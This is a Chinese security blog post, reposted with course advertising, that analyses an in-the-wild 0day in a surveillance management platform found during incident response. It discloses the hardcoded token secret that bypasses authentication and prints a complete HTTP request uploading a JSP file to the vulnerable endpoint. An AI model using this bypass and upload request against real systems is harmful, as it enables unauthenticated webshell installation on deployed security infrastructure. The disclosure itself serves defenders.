某康 iVMS-8700 综合安防在野 0day 捕捉记录

渗透技巧 1年前 (2023) admin
1,624 0 0

嗨,朋友你好,这里是闪石星曜CyberSecurity。

(大家记得给公众号点个星标哦,实时获取最新干货不迷路~)


今天为大家带来的是【炼石计划@渗透红队攻防】内部圈子原创文章之某康 iVMS-8700 综合安防在野 0day 捕捉记录。内部课程文章部分分享给大家学习,如果你也想学习更多红队攻防技巧,欢迎加入我们。


【炼石计划@渗透红队攻防】

是一个专注渗透红队攻防的内部圈子,多维度分享和红队攻防息息相关的内容,包括但不限于 Java 代码审计,PHP 代码审计,Web进阶渗透,红队攻防实战总结,漏洞复现等内容。2023年核心主题是【红队攻防一百篇】,传递一手的红队攻防,黑灰对抗,护VV等实战经验,第一时间总结,第一时间反馈,让大家第一时间学习吸收到最新的技术,打破信息传递壁垒。       

当然,内部圈子不仅有【渗透红队攻防实战 100 篇】的飞升期的武功秘籍,还有【Java安全基础 15 篇(已完成)】、【JavaWeb代码审计基础 15 篇(已完成)】、【PHP之WEB安全基础 13 篇(已完成)】、【Python基础 8 篇(已完成)】、【漏洞复现 50 篇(分享中)】、【CMS系统代码审计 10 套- 20 篇(分享中)】、【内部 CS 插件】等筑基期的武功秘籍。总之这里从基础到进阶都所有涉及,最终在实战秘籍中提升自己!

现仅需 133 元一年(自加入起计算),这点投资会让你有成倍的收获!

某康 iVMS-8700 综合安防在野 0day 捕捉记录


起因-日志分析

某次行业hw客户服务器说被人上shell了,看了下发现是哥斯拉默认密码,就直接通过shell连上服务器

某康 iVMS-8700 综合安防在野 0day 捕捉记录

某康 iVMS-8700 综合安防在野 0day 捕捉记录

观察一波,该系统是 Java 语言,Tomcat 中间件,于是先还原一波大黑客的攻击路径。

去到xxx/Tomcat/logs/目录下找 4.25 这个日期的日志

某康 iVMS-8700 综合安防在野 0day 捕捉记录

通过定位 webshell 的访问路径,可以看到在POST /eps/resourceOperations/upload.action 该接口后直接就getshell,然后就访问上传的webshell了

某康 iVMS-8700 综合安防在野 0day 捕捉记录


经过-漏洞分析

通过日志分析得到了攻击者的攻击路径,那么接下来就开始审计,进一步还原攻击者的路径

因为shell 是在eps目录下上的,所以直接在eps目录下搜索文件上传的关键字

某康 iVMS-8700 综合安防在野 0day 捕捉记录

某康 iVMS-8700 综合安防在野 0day 捕捉记录

发现一个上传接口,而且对文件名后缀没啥过滤

通过查看web.xml,所以最终采用了下面链接这种方式来访问。

http://xxxx/eps/api/resourceOperations/upload

某康 iVMS-8700 综合安防在野 0day 捕捉记录

尝试了一波,发现需要token

某康 iVMS-8700 综合安防在野 0day 捕捉记录


结果-权限绕过

通过搜索关键字,在epsWEB-INFlibcms-common-util-2.9.1-SNAPSHOT.jar定位到鉴权代码

某康 iVMS-8700 综合安防在野 0day 捕捉记录

token= http://xxxx/要访问的接口拼接密钥 secretKeyIbuilding

某康 iVMS-8700 综合安防在野 0day 捕捉记录

比如需要访问

http://192.168.1.1:8888/eps/api/resourceOperations/upload路径 则 token 为

http://192.168.1.1:8888/eps/api/resourceOperations/uploadsecretKeyIbuilding的大写md5值

某康 iVMS-8700 综合安防在野 0day 捕捉记录

某康 iVMS-8700 综合安防在野 0day 捕捉记录


某康 iVMS-8700 综合安防在野 0day 捕捉记录

附上检测payload

 POST /eps/api/resourceOperations/upload?token=xxxx HTTP/1.1
 Host: x.x.x.x
 Content-Length: 183
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: null
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGEJwjlojPo
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
 Connection: close
 
 ------WebKitFormBoundaryGEJwjlojPo
 Content-Disposition: form-data; name="fileUploader"; filename="222.jsp"
 Content-Type: image/jpeg
 
 test
 ------WebKitFormBoundaryGEJwjlojPo--


内卷时刻

以下是我的三个内部圈子,已经都稳定运行一年了,不割韭菜,分享实打实的知识,大家可以根据自己的方向选择,来吧一起内卷。大家可点击下方链接获取详细介绍。


【炼石计划@Java代码审计】

点我获取详细介绍

一个专注 Java 代码审计,系统化从基础入门到实战提升学习 Java 代码审计的地方。这里不仅注重夯实基础,更加专注实战进阶。从基础概念知识开始学习,配合项目级系统实战,共六大学习阶段,约 150 篇原创教程,带你提升真正的 Java 代码审计技术!利用碎片化时间学习也会让你有不菲的收获,总之这里一定是你不错的选择。

现在一年仅需 133元,自从加入起计算,每天仅需三毛多。

某康 iVMS-8700 综合安防在野 0day 捕捉记录

【炼石计划@PHP代码审计】

点我获取详细介绍

一个专注 PHP 代码审计,系统化从基础入门到实战提升学习 PHP 代码审计的地方。这里不仅注重夯实基础,更加专注实战进阶。从基础概念知识开始学习,配合项目级系统实战演练,共六大学习阶段,一百二十余篇原创教程,带你提升真正的 PHP 代码审计技术!利用碎片化时间学习也会让你有不菲的收获,总之这里一定是你不错的选择。

加上 2023 年主题是【挖 0day,交 CNVD】,目标是带大家挖掘两中一高 CNVD 证书,激情碰撞下来,收获最多的一定是你!

现在一年仅需 133元,自从加入起计算,每天仅需两毛多。

某康 iVMS-8700 综合安防在野 0day 捕捉记录

【炼石计划@渗透红队攻防】

点我获取详细介绍

是一个专注渗透红队攻防的内部圈子,多维度分享和红队攻防息息相关的内容,包括但不限于 Java 代码审计,PHP 代码审计,Web进阶渗透,红队攻防实战总结,漏洞复现等内容。2023年核心主题是【红队攻防一百篇】,传递一手的红队攻防,黑灰对抗,护VV等实战经验,第一时间总结,第一时间反馈,让大家第一时间学习吸收到最新的技术,打破信息传递壁垒。       

当然,内部圈子不仅有【渗透红队攻防实战 100 篇】的飞升期的武功秘籍,还有【Java安全基础 15 篇(已完成)】、【JavaWeb代码审计基础 15 篇(已完成)】、【PHP之WEB安全基础 13 篇(已完成)】、【Python基础 8 篇(已完成)】、【漏洞复现 50 篇(分享中)】、【CMS系统代码审计 10 套- 20 篇(分享中)】、【内部 CS 插件】等筑基期的武功秘籍。总之这里从基础到进阶都所有涉及,最终在实战秘籍中提升自己!

现在一年仅需 133元,自从加入计算,每天仅需三毛多。

某康 iVMS-8700 综合安防在野 0day 捕捉记录

随着人数以及原创内容的增多,价格只增不减,

投资自己永远不会被甩下。



原文始发于微信公众号(闪石星曜CyberSecurity):某康 iVMS-8700 综合安防在野 0day 捕捉记录

版权声明:admin 发表于 2023年5月18日 上午6:17。
转载请注明:某康 iVMS-8700 综合安防在野 0day 捕捉记录 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...